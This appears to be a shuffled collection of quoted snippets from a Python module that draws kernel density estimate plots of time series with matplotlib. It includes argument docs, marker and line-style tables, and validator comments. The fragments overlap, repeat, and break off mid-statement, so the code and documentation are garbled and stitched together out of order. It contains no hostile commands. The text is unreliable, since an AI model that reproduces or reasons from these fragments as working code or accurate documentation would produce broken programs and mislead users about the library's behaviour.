drawstyle=drawstyle, por=por, invert_xaxis=invert_xaxis,", "DEPRECATED: use '--type=\"lognorm_yaxis\"' instead. xy_match_line : str [optional, defaults is", "line. vlines_ymin: [optional, defaults to None] List of minimum y", "prob_plot_sort_values=prob_plot_sort_values, source_units=source_units, target_units=target_units, lag_plot_lag=lag_plot_lag, plot_styles=plot_styles, hlines_y=hlines_y, hlines_xmin=hlines_xmin, hlines_xmax=hlines_xmax, hlines_colors=hlines_colors, hlines_linestyles=hlines_linestyles,", "--type=\"lognorm_xaxis\" * For --lognorm_yaxis use --type=\"lognorm_yaxis\" * \"\"\" ) if", "is False] Whether to plot on the secondary y-axis. If", "will not plot a marker. If 'auto' will iterate through", "If a list/tuple, which time-series to plot on secondary y-axis.", "# \"seaborn-deep\", # \"seaborn-muted\", # \"seaborn-notebook\", # \"seaborn-paper\", # \"seaborn-pastel\",", "= tsutils.make_list(style) if len(nstyle) != len(tsd.columns): raise ValueError( tsutils.error_wrapper( \"\"\"", "line. hlines_xmin: [optional, defaults to None] List of minimum x", "plot_styles=[ # str, # [ # \"domain\", # [ #", "utf-8 -*- \"\"\"Collection of functions for the manipulation of time", "else: bar_hatchstyles = tsutils.make_list(bar_hatchstyles) if markerstyles == \"auto\": markerstyles =", "line supply a comma separated matplotlib color codes, or within", "| +-------+----------------+ | 8 | octagon | +-------+----------------+ | s", "__future__ import absolute_import, division, print_function import itertools import os import", "\"science\", \"grid\", \"ieee\", \"scatter\", \"notebook\", \"high-vis\", \"bright\", \"vibrant\", \"muted\", and", "i in linestyles] markerstyles = [\" \" if i is", "if len(st) == 1: markerstyles.append(\" \") linestyles.append(\"-\") continue if st[1]", "None], # vlines_ymin=[float, [\"pass\", []], None], # vlines_ymax=[float, [\"pass\", []],", "xtitle=xtitle, ytitle=ytitle, title=title, figsize=figsize, legend=legend, legend_names=legend_names, subplots=subplots, sharex=sharex, sharey=sharey, colors=colors,", "a plot of estimation of the probability density function based", "\"time\", \"xy\", \"bar\", \"bar_stacked\", \"histogram\", \"norm_xaxis\", \"lognorm_xaxis\", \"weibull_xaxis\", \"norm_yaxis\", \"lognorm_yaxis\",", "[]], None], # hlines_xmin=[float, [\"pass\", []], None], # hlines_xmax=[float, [\"pass\",", "[optional, defaults to None] List of colors for the horizontal", "# \"seaborn-muted\", # \"seaborn-notebook\", # \"seaborn-paper\", # \"seaborn-pastel\", # \"seaborn-poster\",", "and is maintained for backward-compatibility. ACCEPTS:: ['default' | 'steps' |", "[\"kde\", \"hist\"]], 1], # bootstrap_size=[int, [\"range\", [0, None]], 1], #", "grid=[bool, [\"domain\", [True, False]], 1], # label_rotation=[float, [\"pass\", []], 1],", "= tsutils.make_list(vlines_ymin) vlines_ymax = tsutils.make_list(vlines_ymax) vlines_colors = tsutils.make_list(vlines_colors) vlines_linestyles =", "| diamond | +-------+----------------+ | d | thin diamond |", "ticks. label_rotation : int [optional] Rotation for major labels for", "type=[str, [\"domain\", [\"kde\",],], 1,], # lag_plot_lag=[int, [\"range\", [1, None]], 1],", "lognorm_yaxis=False, xy_match_line=\"\", grid=False, label_rotation=None, label_skip=1, force_freq=None, drawstyle=\"default\", por=False, invert_xaxis=False, invert_yaxis=False,", "| - | horizontal | +-----------------+-------------------+ | + | crossed", "# 1, # ], # prob_plot_sort_values=[str, [\"domain\", [\"ascending\", \"descending\"]], 1],", "default to \"auto\", only used if type equal to \"bar\",", "nothing | +---------+--------------+ Line reference: http://matplotlib.org/api/artist_api.html markerstyles [optional, default to", "# \"seaborn-darkgrid\", # \"seaborn-deep\", # \"seaborn-muted\", # \"seaborn-notebook\", # \"seaborn-paper\",", "as the color for all vertical lines. If a list", "for all horizontal lines. If a list must be same", "| pentagon | +-------+----------------+ | ``*`` | star | +-------+----------------+", "`vlines_x`. If None will take from the color pallette in", "plotutils.HATCH_LIST], None], # style=[str, [\"pass\", []], None], # xlim=[float, [\"pass\",", "\"dark_background\", # \"fast\", # \"fivethirtyeight\", # \"ggplot\", # \"grayscale\", #", "defaults to 'plot.png'] Output filename for the plot. Extension defines", "None: plt.setp(line, color=c) plt.setp(line, marker=m) plt.setp(line, linestyle=l) ytitle = ytitle", "ytitle = ytitle or \"Density\" if legend is True: plt.legend(loc=\"best\")", "Lines | +=========+==============+ | ``-`` | solid | +---------+--------------+ |", "| nothing | +-------+----------------+ Marker reference: http://matplotlib.org/api/markers_api.html style [optional, default", "connects the points with lines. The steps variants produce step-plots.", "that can then be changed or added to as needed.", "a list of color code strings. Can identify colors in", "\"seaborn-whitegrid\", # \"tableau-colorblind10\", # \"science\", # \"grid\", # \"ieee\", #", "for the standard linestyles list. vlines_x: [optional, defaults to None]", "int [optional, defaults to 50] The size of the random", "if markerstyles == \"auto\": markerstyles = plotutils.MARKER_LIST else: markerstyles =", "# \"seaborn\", # \"seaborn-bright\", # \"seaborn-colorblind\", # \"seaborn-dark\", # \"seaborn-dark-palette\",", "Only used for norm_xaxis, norm_yaxis, lognorm_xaxis, lognorm_yaxis, weibull_xaxis, and weibull_yaxis.", "have the same number of style strings as time-series to", "raise ValueError( tsutils.error_wrapper( \"\"\" You have to have the same", "x | +-------+----------------+ | D | diamond | +-------+----------------+ |", "If 'auto' will iterate through the available matplotlib hatch types.", "[\"pass\", []], None], # xlim=[float, [\"pass\", []], 2], # ylim=[float,", "--type=\"lognorm_yaxis\" * \"\"\" ) if xaxis == \"log\": logx =", "# ytitle=[str, [\"pass\", []], 1], # title=[str, [\"pass\", []], 1],", "None]], 1], # xy_match_line=[str, [\"pass\", []], 1], # grid=[bool, [\"domain\",", "Matplotlib styles: https://matplotlib.org/3.3.1/gallery/style_sheets/style_sheets_reference.html SciencePlots styles: https://github.com/garrettj403/SciencePlots hlines_y: [optional, defaults to", "of strings if using the Python API. Separated 'colors', 'linestyles',", "\"grayscale\", # \"seaborn\", # \"seaborn-bright\", # \"seaborn-colorblind\", # \"seaborn-dark\", #", "plotting_position=plotting_position, prob_plot_sort_values=prob_plot_sort_values, source_units=source_units, target_units=target_units, lag_plot_lag=lag_plot_lag, plot_styles=plot_styles, hlines_y=hlines_y, hlines_xmin=hlines_xmin, hlines_xmax=hlines_xmax, hlines_colors=hlines_colors,", "defaults to None] List of colors for the horizontal lines.", "vlines_x = tsutils.make_list(vlines_x) vlines_ymin = tsutils.make_list(vlines_ymin) vlines_ymax = tsutils.make_list(vlines_ymax) vlines_colors", "* | stars | +-----------------+-------------------+ logx DEPRECATED: use '--xaxis=\"log\"' instead.", "== \"log\": logx = True if yaxis == \"log\": logy", "'auto' will cycle through matplotlib colors in the chosen style.", "use '--type=\"norm_xaxis\"' instead. norm_yaxis DEPRECATED: use '--type=\"norm_yaxis\"' instead. lognorm_xaxis DEPRECATED:", "`hlines_y`. If None will take for the standard linestyles list.", "over rides some or all of the characteristics of the", "\"] + plotutils.LINE_LIST], None], # markerstyles=[str, [\"domain\", [\"auto\", None, \"\",", "sharey=sharey, colors=colors, linestyles=linestyles, markerstyles=markerstyles, bar_hatchstyles=bar_hatchstyles, style=style, logx=logx, logy=logy, xaxis=xaxis, yaxis=yaxis,", "the Python API. To not display lines use a space", "\"seaborn-deep\", \"seaborn-muted\", \"seaborn-notebook\", \"seaborn-paper\", \"seaborn-pastel\", \"seaborn-poster\", \"seaborn-talk\", \"seaborn-ticks\", \"seaborn-white\", \"seaborn-whitegrid\",", "input_ts, skiprows=skiprows, names=names, index_type=index_type, start_date=start_date, end_date=end_date, pick=columns, round_index=round_index, dropna=\"all\", source_units=source_units,", "[optional] Plot from first good value to last good value.", "import matplotlib matplotlib.use(\"Agg\") import matplotlib.pyplot as plt from matplotlib.ticker import", "subplots=subplots, sharex=sharex, sharey=sharey, style=None, logx=logx, logy=logy, xlim=xlim, ylim=ylim, secondary_y=secondary_y, figsize=figsize,", "not None: m = next(imarkerstyles) else: m = None if", "hlines_xmin = nxlim[0] if hlines_xmax is None: hlines_xmax = nxlim[1]", "plotutils.MARKER_LIST], None], # bar_hatchstyles=[str, [\"domain\", [\"auto\", None, \"\", \" \",", "matplotlib marker types. Otherwise on the command line a comma", "maximum x values to end each vertical line. If a", "[optional, defaults to False] Make separate subplots for each time", "+ plotutils.LINE_LIST], None], # markerstyles=[str, [\"domain\", [\"auto\", None, \"\", \"", "Comma separated lower and upper limits for the x-axis of", ") if vlines_x is not None: if type in [\"norm_xaxis\",", "+-------+----------------+ | > | triangle right | +-------+----------------+ | 1", "[optional, default is False] Invert the y-axis. plotting_position : str", "and set the upper limit to 1000. ylim [optional, default", "default is based on range of y values] Comma separated", "series.\"\"\" from __future__ import absolute_import, division, print_function import itertools import", "markerstyles [optional, default to ' '] The default ' '", "plot. vlines_colors: [optional, defaults to None] List of colors for", "ways. 1. Use 'CN' where N is a number from", "logx=logx, logy=logy, xlim=xlim, ylim=ylim, secondary_y=secondary_y, figsize=figsize, ) for index, line", "colors = [] markerstyles = [] linestyles = [] for", "options are deprecated. * * For --logx use --xaxis=\"log\" *", "colors=hlines_colors, linestyles=hlines_linestyles, ) if vlines_x is not None: if type", "None, \"\", \" \", \" \"] + plotutils.MARKER_LIST], None], #", "In case subplots=True, share y axis. colors [optional, default is", "a match line where x == y. Set to a", "| nothing | +-------+----------------+ | ' ' | nothing |", "nothing | +---------+--------------+ | '' | draw nothing | +---------+--------------+", "character code from the table below. +------+---------+ | Code |", "to ' '] The default ' ' will not plot", "linestyles = [\" \" if i in [\" \", None]", "plot. One or more of Matplotlib styles \"classic\", \"Solarize_Light2\", \"bmh\",", "| triangle right | +-------+----------------+ | 1 | tri_down |", "[True, False]], 1], # sharex=[bool, [\"domain\", [True, False]], 1], #", "\"hazen\", \"cunnane\", \"california\"], # ], # 1, # ], #", "# -*- coding: utf-8 -*- \"\"\"Collection of functions for the", "\"seaborn-paper\", \"seaborn-pastel\", \"seaborn-poster\", \"seaborn-talk\", \"seaborn-ticks\", \"seaborn-white\", \"seaborn-whitegrid\", \"tableau-colorblind10\", and SciencePlots", "maximum x value for all vertical lines. A missing value", "[optional, default is False] Whether to plot grid lines on", "| Code | Markers | +=======+================+ | . | point", "columns=columns, start_date=start_date, end_date=end_date, clean=clean, skiprows=skiprows, index_type=index_type, names=names, ofilename=ofilename, xtitle=xtitle, ytitle=ytitle,", "[\"ascending\", \"descending\"]], 1], # plot_styles=[ # str, # [ #", "= \" \" if style != \"auto\": nstyle = tsutils.make_list(style)", "[True, False]], 1], # invert_xaxis=[bool, [\"domain\", [True, False]], 1], #", "\"domain\", # [ # \"classic\", # \"Solarize_Light2\", # \"bmh\", #", "m | magenta | +------+---------+ | y | yellow |", "the \"ieee\" also will change the chart size to fit", "lognorm_xaxis is True or lognorm_yaxis is True ): warnings.warn( \"\"\"", "plot. hlines_colors: [optional, defaults to None] List of colors for", "None] Legend would normally use the time-series names associated with", "has {} style strings, but you have {} time-series. \"\"\".format(", "legend is None) type = \"kde\" import matplotlib matplotlib.use(\"Agg\") import", "single number will be used as the minimum x values", "then will be used as the color for all vertical", "| burlywood | +------------------+ | chartreuse | +------------------+ | ...etc.", "vlines_ymax=None, vlines_colors=None, vlines_linestyles=\"-\", ): r\"\"\"Kernel density estimation of probability density", "\"tukey\", \"gumbel\", \"hazen\", \"cunnane\", \"california\"], # ], # 1, #", "True or lognorm_yaxis is True ): warnings.warn( \"\"\" * *", "'--type=\"norm_yaxis\"' instead. lognorm_xaxis DEPRECATED: use '--type=\"lognorm_xaxis\"' instead. lognorm_yaxis DEPRECATED: use", "| 'steps-mid' | 'steps-post'] por [optional] Plot from first good", "of the characteristics of the previous. Color Blind Appropriate Styles", "lower and upper limits for the x-axis of the plot.", "Code | Markers | +=======+================+ | . | point |", "end_date=end_date, clean=clean, skiprows=skiprows, index_type=index_type, names=names, ofilename=ofilename, xtitle=xtitle, ytitle=ytitle, title=title, figsize=figsize,", "+-----------------+-------------------+ | + | crossed | +-----------------+-------------------+ | x |", "labels for bar plots. label_skip : int [optional] Skip for", "linestyles for the horizontal lines. If a single linestyle then", "short freq string (day) OR (2 day) short_freq = \"({})\".format(pltfreq[beginstr:-1])", "the points with lines. The steps variants produce step-plots. 'steps'", "| o | small circle | +-----------------+-------------------+ | O |", "secondary y-axis. If a list/tuple, which time-series to plot on", "None], # style=[str, [\"pass\", []], None], # xlim=[float, [\"pass\", []],", "por=[bool, [\"domain\", [True, False]], 1], # invert_xaxis=[bool, [\"domain\", [True, False]],", "# [ # \"domain\", # [ # \"classic\", # \"Solarize_Light2\",", "'--type=\"norm_xaxis\"' instead. norm_yaxis DEPRECATED: use '--type=\"norm_yaxis\"' instead. lognorm_xaxis DEPRECATED: use", "ytitle or \"Density\" if legend is True: plt.legend(loc=\"best\") if hlines_y", "['default' | 'steps' | 'steps-pre' | 'steps-mid' | 'steps-post'] por", "List of linestyles for the horizontal lines. If a single", "markerstyles.append(st[1]) try: linestyles.append(st[2:]) except IndexError: linestyles.append(\" \") else: markerstyles.append(\" \")", "| red | +------------------+ | burlywood | +------------------+ | chartreuse", ") plt.xlabel(xtitle) plt.ylabel(ytitle) if invert_xaxis is True: plt.gca().invert_xaxis() if invert_yaxis", "upper limits for the x-axis of the plot. For example,", "pick=columns, round_index=round_index, dropna=\"all\", source_units=source_units, target_units=target_units, clean=clean, por=por, ) tsd, lnames", "secondary_y=[bool, [\"domain\", [True, False]], 1], # mark_right=[bool, [\"domain\", [True, False]],", "logx DEPRECATED: use '--xaxis=\"log\"' instead. logy DEPRECATED: use '--yaxis=\"log\"' instead.", "invert_xaxis=False, invert_yaxis=False, round_index=None, plotting_position=\"weibull\", prob_plot_sort_values=\"descending\", source_units=None, target_units=None, lag_plot_lag=1, plot_styles=\"bright\", hlines_y=None,", "[\"domain\", [\"auto\", None, \"\", \" \", \" \"] + plotutils.HATCH_LIST],", "\"muted\", # \"retro\", # ], # ], # None, #", "[optional, default to False] In case subplots=True, share y axis.", "then will be used as the linestyle for all horizontal", "logy=False, xaxis=\"arithmetic\", yaxis=\"arithmetic\", xlim=None, ylim=None, secondary_y=False, mark_right=True, scatter_matrix_diagonal=\"kde\", bootstrap_size=50, bootstrap_samples=500,", "[\" \", None] else i for i in linestyles] markerstyles", "names=names, index_type=index_type, start_date=start_date, end_date=end_date, pick=columns, round_index=round_index, dropna=\"all\", source_units=source_units, target_units=target_units, clean=clean,", "circle | +-------+----------------+ | v | triangle down | +-------+----------------+", "hlines_linestyles=\"-\", vlines_x=None, vlines_ymin=None, vlines_ymax=None, vlines_colors=None, vlines_linestyles=\"-\", ): r\"\"\"Kernel density estimation", "first good value to last good value. Strips NANs from", "defaults is ''] Will add a match line where x", "number of style strings as time-series to plot. You supplied", "is None: vlines_ymin = nylim[0] if vlines_ymax is None: vlines_ymax", "instead. lognorm_xaxis DEPRECATED: use '--type=\"lognorm_xaxis\"' instead. lognorm_yaxis DEPRECATED: use '--type=\"lognorm_yaxis\"'", "str [optional, default is 'default'] 'default' connects the points with", "Defines the type of the yaxis. One of 'arithmetic', 'log'.", "for photo-copyable black, white, nd gray. Matplotlib styles: https://matplotlib.org/3.3.1/gallery/style_sheets/style_sheets_reference.html SciencePlots", "random subsets of 'bootstrap_size'. norm_xaxis DEPRECATED: use '--type=\"norm_xaxis\"' instead. norm_yaxis", "r\"\"\"Plot data.\"\"\" # Need to work around some old option", "= tsutils.make_list(hlines_y) hlines_xmin = tsutils.make_list(hlines_xmin) hlines_xmax = tsutils.make_list(hlines_xmax) hlines_colors =", "string (day) OR (2 day) short_freq = \"({})\".format(pltfreq[beginstr:-1]) except AttributeError:", "{force_freq} invert_xaxis [optional, default is False] Invert the x-axis. invert_yaxis", "from first good value to last good value. Strips NANs", "then be changed or added to as needed. lag_plot_lag [optional,", "'legend_names' option allows you to override the names in the", "as `hlines_y`. If a single number will be used as", "is True or norm_xaxis is True or norm_yaxis is True", "will end at the maximum x value for the entire", "[optional, default is based on range of y values] Comma", "\"seaborn-ticks\", \"seaborn-white\", \"seaborn-whitegrid\", \"tableau-colorblind10\", and SciencePlots styles \"science\", \"grid\", \"ieee\",", "'10,6.5'] The 'width,height' of plot in inches. legend [optional, defaults", "the x-axis. invert_yaxis [optional, default is False] Invert the y-axis.", "{target_units} {round_index} plot_styles: str [optional, default is \"default\"] Set the", "Whether to plot on the secondary y-axis. If a list/tuple,", "of the \"IEEE\" journal. The \"grayscale\" is another style useful", "names=names, ofilename=ofilename, xtitle=xtitle, ytitle=ytitle, title=title, figsize=figsize, legend=legend, legend_names=legend_names, subplots=subplots, sharex=sharex,", "pltfreq = str(tsd.index.freq, \"utf-8\").lower() except TypeError: pltfreq = str(tsd.index.freq).lower() if", "\"grayscale\", \"seaborn\", \"seaborn-bright\", \"seaborn-colorblind\", \"seaborn-dark\", \"seaborn-dark-palette\", \"seaborn-darkgrid\", \"seaborn-deep\", \"seaborn-muted\", \"seaborn-notebook\",", "logx is True or logy is True or norm_xaxis is", "Use 'CN' where N is a number from 0 to", "separated matplotlib color codes, or within Python a list of", "DEPRECATED: use '--type=\"norm_yaxis\"' instead. lognorm_xaxis DEPRECATED: use '--type=\"lognorm_xaxis\"' instead. lognorm_yaxis", "= itertools.cycle(bar_hatchstyles) if ( logx is True or logy is", "for the entire plot. vlines_colors: [optional, defaults to None] List", "as `vlines_x`. If None will take from the color pallette", ".. import plotutils warnings.filterwarnings(\"ignore\") @mando.command(\"kde\", formatter_class=RSTHelpFormatter, doctype=\"numpy\") @tsutils.doc(plotutils.ldocstrings) def kde_cli(", "None if imarkerstyles is not None: m = next(imarkerstyles) else:", "import tsutils from .. import plotutils warnings.filterwarnings(\"ignore\") @mando.command(\"kde\", formatter_class=RSTHelpFormatter, doctype=\"numpy\")", "' ' will not plot a marker. If 'auto' will", "else: linestyles = [\" \" if i in [\" \",", "| Markers | +=======+================+ | . | point | +-------+----------------+", "length as `hlines_y`. If None will take from the color", "default is 'default'] 'default' connects the points with lines. The", "except TypeError: pltfreq = str(tsd.index.freq).lower() if pltfreq.split(\" \")[0][1:] == \"1\":", "| back diagonal | +-----------------+-------------------+ | ``|`` | vertical |", "str [optional, default is 'arithmetic'] Defines the type of the", "+-------+----------------+ | D | diamond | +-------+----------------+ | d |", "color blindness. Black, White, and Gray Styles The \"ieee\" style", "on ``type``] Title of x-axis. ytitle : str [optional, default", "same length as `vlines_x`. If a single number will be", "in plot_styles ] plt.style.use(plot_styles) figsize = tsutils.make_list(figsize, n=2) _, ax", "\")[0][1:] == \"1\": beginstr = 3 else: beginstr = 1", "import plotutils warnings.filterwarnings(\"ignore\") @mando.command(\"kde\", formatter_class=RSTHelpFormatter, doctype=\"numpy\") @tsutils.doc(plotutils.ldocstrings) def kde_cli( input_ts=\"-\",", "same length as `vlines_x`. If None will take for the", "[True, False]], 1], # legend_names=[str, [\"pass\", []], 1], # subplots=[bool,", "is None else i for i in markerstyles] if colors", "to place a horizontal line. hlines_xmin: [optional, defaults to None]", "old option defaults with the implementation of # mando legend", "tsutils.common_kwds( input_ts, skiprows=skiprows, names=names, index_type=index_type, start_date=start_date, end_date=end_date, pick=columns, round_index=round_index, dropna=\"all\",", "plotting_position=\"weibull\", prob_plot_sort_values=\"descending\", source_units=None, target_units=None, lag_plot_lag=1, plot_styles=\"bright\", hlines_y=None, hlines_xmin=None, hlines_xmax=None, hlines_colors=None,", "| triangle down | +-------+----------------+ | ^ | triangle up", "in the current plot style. hlines_linestyles: [optional, defaults to None]", "`hlines_y`. If None will take from the color pallette in", "`ofilename` is None will return the Matplotlib figure that can", "y-axis. mark_right [optional, default is True] When using a secondary_y", "or list of y values where to place a horizontal", "to plot on the secondary y-axis. If a list/tuple, which", "short_freq = \"\" if colors == \"auto\": colors = None", "tsutils.make_list(vlines_ymax) vlines_colors = tsutils.make_list(vlines_colors) vlines_linestyles = tsutils.make_list(vlines_linestyles) nylim = ax.get_ylim()", "TypeError: pltfreq = str(tsd.index.freq).lower() if pltfreq.split(\" \")[0][1:] == \"1\": beginstr", "same length as `vlines_x`. If None will take from the", "reference: http://matplotlib.org/api/colors_api.html linestyles [optional, default to 'auto'] If 'auto' will", "of colors for the horizontal lines. If a single color", "< | triangle left | +-------+----------------+ | > | triangle", "as the linestyle for all vertical lines. If a list", "| +======+=========+ | b | blue | +------+---------+ | g", "code strings. Can identify colors in four different ways. 1.", "1], # figsize=[float, [\"range\", [0, None]], 2], # legend=[bool, [\"domain\",", "+---------+--------------+ | Code | Lines | +=========+==============+ | ``-`` |", "nstyle = tsutils.make_list(style) if len(nstyle) != len(tsd.columns): raise ValueError( tsutils.error_wrapper(", "if markerstyles is None: markerstyles = \" \" if style", "as `hlines_y`. If None will take from the color pallette", "{round_index} plot_styles: str [optional, default is \"default\"] Set the style", "+---------+--------------+ | -- | dashed | +---------+--------------+ | -. |", "line. If a list must be same length as `vlines_x`.", "| Code | Color | +======+=========+ | b | blue", "a horizontal line. hlines_xmin: [optional, defaults to None] List of", "| small circle | +-----------------+-------------------+ | O | large circle", "colors == \"auto\": colors = None else: colors = tsutils.make_list(colors)", "create a plot of estimation of the probability density function", "matplotlib.use(\"Agg\") import matplotlib.pyplot as plt from matplotlib.ticker import FixedLocator tsd", "set the upper limit to 1000. ylim [optional, default is", "Title of chart. figsize : str [optional, defaults to '10,6.5']", "= nxlim[1] if vlines_x is not None: vlines_x = tsutils.make_list(vlines_x)", "type of the yaxis. One of 'arithmetic', 'log'. secondary_y [optional,", "points with lines. The steps variants produce step-plots. 'steps' is", "None if ilinestyles is not None: l = next(ilinestyles) else:", "# ) def kde( input_ts=\"-\", columns=None, start_date=None, end_date=None, clean=False, skiprows=None,", ") ) colors = [] markerstyles = [] linestyles =", "if pltfreq.split(\" \")[0][1:] == \"1\": beginstr = 3 else: beginstr", "will be used as the linestyle for all horizontal lines.", "+-------+----------------+ | Code | Markers | +=======+================+ | . |", "| +-------+----------------+ | 4 | tri_right | +-------+----------------+ | 8", "str, # [\"domain\", [\"auto\", None, \"\", \" \", \" \"]", "\"classic\", # \"Solarize_Light2\", # \"bmh\", # \"dark_background\", # \"fast\", #", "length as `hlines_y`. If a single number will be used", "default ' ' will not plot a marker. If 'auto'", "used within Python, and `ofilename` is None will return the", "Rotation for major labels for bar plots. label_skip : int", "| bar_hatchstyles | Description | +=================+===================+ | / | diagonal", "axis, should the legend label the axis of the various", "= str(tsd.index.freq, \"utf-8\").lower() except TypeError: pltfreq = str(tsd.index.freq).lower() if pltfreq.split(\"", "ax.get_xlim() if hlines_xmin is None: hlines_xmin = nxlim[0] if hlines_xmax", "is 'arithmetic'] Defines the type of the yaxis. One of", "bootstrap_size=[int, [\"range\", [0, None]], 1], # xy_match_line=[str, [\"pass\", []], 1],", "\"Solarize_Light2\", # \"bmh\", # \"dark_background\", # \"fast\", # \"fivethirtyeight\", #", "], # None, # ], # hlines_y=[float, [\"pass\", []], None],", "the entire plot. hlines_xmax: [optional, defaults to None] List of", "input data. The 'legend_names' option allows you to override the", "is None: markerstyles = \" \" if style != \"auto\":", "vertical line. If a list must be same length as", "# \"fast\", # \"fivethirtyeight\", # \"ggplot\", # \"grayscale\", # \"seaborn\",", "At the command line supply a comma separated matplotlib color", "to 9 that gets the Nth color from the current", "If multiple styles then each over rides some or all", "will take from the color pallette in the current plot", "ytitle=ytitle, title=title, figsize=figsize, legend=legend, legend_names=legend_names, subplots=subplots, sharex=sharex, sharey=sharey, colors=colors, linestyles=linestyles,", "from __future__ import absolute_import, division, print_function import itertools import os", "yaxis=\"arithmetic\", xlim=None, ylim=None, secondary_y=False, mark_right=True, scatter_matrix_diagonal=\"kde\", bootstrap_size=50, bootstrap_samples=500, norm_xaxis=False, norm_yaxis=False,", "red dashed line with star marker. bar_hatchstyles [optional, default to", "of time series.\"\"\" from __future__ import absolute_import, division, print_function import", "default is 'auto'] The default 'auto' will cycle through matplotlib", "{clean} {skiprows} {index_type} {names} {source_units} {target_units} {round_index} plot_styles: str [optional,", "+-------+----------------+ | 8 | octagon | +-------+----------------+ | s |", "will change the chart size to fit in a column", "marker=m) plt.setp(line, linestyle=l) ytitle = ytitle or \"Density\" if legend", "Make separate subplots for each time series. sharex [optional, default", "if hlines_xmax is None: hlines_xmax = nxlim[1] if vlines_x is", "{start_date} {end_date} {clean} {skiprows} {index_type} {names} {source_units} {target_units} {round_index} plot_styles:", "| o | circle | +-------+----------------+ | v | triangle", "and * --lognorm_yaxis options are deprecated. * * For --logx", "in plotutils.MARKER_LIST: markerstyles.append(st[1]) try: linestyles.append(st[2:]) except IndexError: linestyles.append(\" \") else:", "None], # markerstyles=[str, [\"domain\", [\"auto\", None, \"\", \" \", \"", "bar_hatchstyles=\"auto\", style=\"auto\", logx=False, logy=False, xaxis=\"arithmetic\", yaxis=\"arithmetic\", xlim=None, ylim=None, secondary_y=False, mark_right=True,", "\"high-vis\", \"bright\", \"vibrant\", \"muted\", and \"retro\". If multiple styles then", "markerstyles=\" \", bar_hatchstyles=\"auto\", style=\"auto\", logx=False, logy=False, xaxis=\"arithmetic\", yaxis=\"arithmetic\", xlim=None, ylim=None,", "bar plots. drawstyle : str [optional, default is 'default'] 'default'", "\"] + plotutils.MARKER_LIST], None], # bar_hatchstyles=[str, [\"domain\", [\"auto\", None, \"\",", "plotutils.check(type, tsd, legend_names) # This is to help pretty print", "linestyles=[str, [\"domain\", [\"auto\", None, \"\", \" \", \" \"] +", "function based on the data called kernel density estimation (KDE).", "pallette in the current plot style. hlines_linestyles: [optional, defaults to", "xaxis=\"arithmetic\", yaxis=\"arithmetic\", xlim=None, ylim=None, secondary_y=False, mark_right=True, scatter_matrix_diagonal=\"kde\", bootstrap_size=50, bootstrap_samples=500, norm_xaxis=False,", "1], # type=[str, [\"domain\", [\"kde\",],], 1,], # lag_plot_lag=[int, [\"range\", [1,", "vlines_ymin=vlines_ymin, vlines_ymax=vlines_ymax, vlines_colors=vlines_colors, vlines_linestyles=vlines_linestyles, ) # @tsutils.validator( # ofilename=[str, [\"pass\",", "ibar_hatchstyles = itertools.cycle(bar_hatchstyles) if ( logx is True or logy", "supply a comma separated matplotlib color codes, or within Python", "is True] When using a secondary_y axis, should the legend", "start_date=start_date, end_date=end_date, pick=columns, round_index=round_index, dropna=\"all\", source_units=source_units, target_units=target_units, clean=clean, por=por, )", "else: c = None if imarkerstyles is not None: m", "the current plot style. vlines_linestyles: [optional, defaults to None] List", "to None] List of maximum x values to end each", "| 2 | tri_up | +-------+----------------+ | 3 | tri_left", "x values for all vertical lines. A missing value or", "vlines_colors=[str, [\"pass\", []], None], # vlines_linestyles=[ # str, # [\"domain\",", "kde( input_ts=\"-\", columns=None, start_date=None, end_date=None, clean=False, skiprows=None, index_type=\"datetime\", names=None, ofilename=\"plot.png\",", "values to start the vertical line. If a list must", "plt from matplotlib.ticker import FixedLocator tsd = tsutils.common_kwds( input_ts, skiprows=skiprows,", "from the current style. 2. Single character code from the", "\"ggplot\", # \"grayscale\", # \"seaborn\", # \"seaborn-bright\", # \"seaborn-colorblind\", #", "the vertical lines. If a single linestyle then will be", "and 'markerstyles' options. Currently the 'style' option will override the", "default is False] Invert the x-axis. invert_yaxis [optional, default is", "hlines_xmax=[float, [\"pass\", []], None], # hlines_colors=[str, [\"pass\", []], None], #", "str [optional, default is 'weibull'] {plotting_position_table} Only used for norm_xaxis,", "major labels for bar plots. label_skip : int [optional] Skip", "line types. Otherwise on the command line a comma separated", "# ], # ], # None, # ], # hlines_y=[float,", "or norm_xaxis is True or norm_yaxis is True or lognorm_xaxis", "the axis of the various time-series automatically. scatter_matrix_diagonal : str", ". | point | +-------+----------------+ | o | circle |", "-*- \"\"\"Collection of functions for the manipulation of time series.\"\"\"", "vlines_x=None, vlines_ymin=None, vlines_ymax=None, vlines_colors=None, vlines_linestyles=\"-\", ): r\"\"\"Kernel density estimation of", "styles: https://github.com/garrettj403/SciencePlots hlines_y: [optional, defaults to None] Number or list", "If a single number will be the maximum x value", "False]], 1], # scatter_matrix_diagonal=[str, [\"domain\", [\"kde\", \"hist\"]], 1], # bootstrap_size=[int,", ") tsd, lnames = plotutils.check(type, tsd, legend_names) # This is", "\"auto\": markerstyles = plotutils.MARKER_LIST else: markerstyles = tsutils.make_list(markerstyles) if markerstyles", "= None else: colors = tsutils.make_list(colors) if linestyles == \"auto\":", "to start the vertical line. If a list must be", "of minimum y values to start the vertical line. If", "coding: utf-8 -*- \"\"\"Collection of functions for the manipulation of", "the level of gray, where 0 is white an 1", "tri_left | +-------+----------------+ | 4 | tri_right | +-------+----------------+ |", "len(st) == 1: markerstyles.append(\" \") linestyles.append(\"-\") continue if st[1] in", "crossed diagonal | +-----------------+-------------------+ | o | small circle |", "[\" \" if i in [\" \", None] else i", "1], # bootstrap_size=[int, [\"range\", [0, None]], 1], # xy_match_line=[str, [\"pass\",", "vlines_ymax = tsutils.make_list(vlines_ymax) vlines_colors = tsutils.make_list(vlines_colors) vlines_linestyles = tsutils.make_list(vlines_linestyles) nylim", "bool(legend == \"\" or legend == \"True\" or legend is", "xlim=xlim, ylim=ylim, secondary_y=secondary_y, mark_right=mark_right, scatter_matrix_diagonal=scatter_matrix_diagonal, bootstrap_size=bootstrap_size, bootstrap_samples=bootstrap_samples, norm_xaxis=norm_xaxis, norm_yaxis=norm_yaxis, lognorm_xaxis=lognorm_xaxis,", "is a red dashed line with star marker. bar_hatchstyles [optional,", "bar_hatchstyles = tsutils.make_list(bar_hatchstyles) if markerstyles == \"auto\": markerstyles = plotutils.MARKER_LIST", "\" \"] + plotutils.LINE_LIST], # None, # ], # vlines_x=[float,", "not None: c = next(icolors) else: c = None if", "or 'hist' for a histogram. bootstrap_size : int [optional, defaults", "type, for example 'filename.png' will create a PNG file. If", "x value for all vertical lines. A missing value or", "linestyles is None: linestyles = [\" \"] else: linestyles =", "is None: linestyles = [\" \"] else: 